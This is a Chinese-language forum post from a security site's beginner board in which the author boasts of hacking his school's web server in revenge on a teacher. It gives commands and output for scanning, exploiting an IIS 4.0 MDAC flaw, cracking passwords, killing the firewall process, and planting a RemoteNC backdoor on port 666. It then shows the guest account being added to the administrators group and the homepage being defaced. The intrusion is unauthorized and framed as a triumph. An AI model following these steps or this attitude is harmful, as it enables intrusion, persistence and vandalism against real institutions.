论坛: 菜鸟乐园 标题: 俺是如何入侵俺们学校的!!!!!!!!!!!!!!!! 复制本贴地址    
作者: jwm3337 [jwm3337]    论坛用户   登录


  


  先用ping命令看看ip是不是存活。
ping www.xxx.edu.cn (此处过滤)

Pinging cernet-sx.xxx.edu.cn [xxx.xxx.xxx.xxx] with 32 bytes of data:

Reply from xxx.xxx.xxx.xxx: bytes=32 time=50ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116

Ping statistics for xxx.xxx.xxx.xxx:
  Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
  Minimum = 40ms, Maximum = 50ms, Average = 42ms
我们注意ttl:
  (注释:指定数据报被路由器丢弃之前允许通过的网段数量。
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。
转发 IP 数据包时,要求路由器至少将 TTL 减小 1!
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
有的经过修改注册表可以修改ttl返回的值的!)
但是,俺估计,学校那帮菜网管,是不会的!
所以,俺判断是nt,所以拿来nape,先扫扫断口!呀!
结果出来了!
找不到netbios断口!呵呵!或许网管被学校的地下“黑客”扫怕了,所以加固了nt系统
并去掉了所有没必要的netbios服务,或者弄了个放火墙。
  只有80和1433和5631是开着的!俺想放火墙,怎么办?
俺收集一下nt信息,看看是什么版本的!
telnet xxx.xxx.xxx.xxx 80
输入:HEAD/index.htm 回车显示是microsoft,iis4.0(有点老了)!
根一本书上说,这个的版本有个mdac漏洞!或许能有作用,俺下了webping.pl进行攻击
哈哈!很快,几秒种后,提示俺“administrator"访问!
到黑白下了个Pwdump去弄pcanywhere的密码,俺输入:dir *cif/s
找到后,把它用tftp拉过来!到小榕那下了个流光破密码!
密码很快就出来了!
users521,俺用pcanywhere和它一连!结果进去了~!哈哈!俺以为大工告成呢!谁知道
系统被锁定!大概是设置了登陆时间或者登陆次数吧!nnd!
再来!回到自己的电脑!窜到bigchen(http://www.ujc081.chinaw3.com/)那。下了个
PSAdmin.zip,解压后用tftp弄上去!运行pslist.exe,找到放火的id
用pskill.exe杀了放火的!
再用nape扫描,哈哈!netbios被打开,可以进行ipc探测了!

下了,x-caner.exe 暴力破!很快出来了!
administrator 密码:admin!・#¥  弱智型的
哈哈!现在我就是上帝了。
net use \\ip\ipc$ "admin!@#$" /user:"administrator"

命令成功完成  (这几个字真熟悉)

拉下小榕的RemoteNC.exe先做个后门,
RemoteNC xxx.xxx.xxx.xxx administrator admin!@#$ RunAsUser "acces" "Provide Local CMD Redirect" 666 lovetecher
没有成功,换了LocalSystem模式,后成功了!
telnet ip 666 输入密码后
RemoteNC>net user guest /active:yes        激活guest
RemoteNC>net user guest lovedo            加个密码为:lovedo
RemoteNC>net localgroup administrators guest /add  把guest加到管理员组
RemoteNC>quit                    退出
哈哈!后门做好了!,这个时候虽然很高兴,可是还是很气愤,老师呀!老师!
为什么要挂我呢?
在主页上随便找个图片,index-09.gif
然后在telnet 666
找主页存放的位置:
RemoteNC>dir d:\index-09.gif/s
驱动器 D 中的卷没有标签。
卷的序列号是 303A-11EE
d:\wwwroot\admin\tupian
主页在d:\wwwroot\admin里了!退出后 做了一个简单的页面,写上某某老师收礼物的字样
加上,一个大大的红红的太阳图片!
copy 到主机d:\wwwroot\admin替换!!    
  
 




地主 发表时间: 09/21 13:00

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号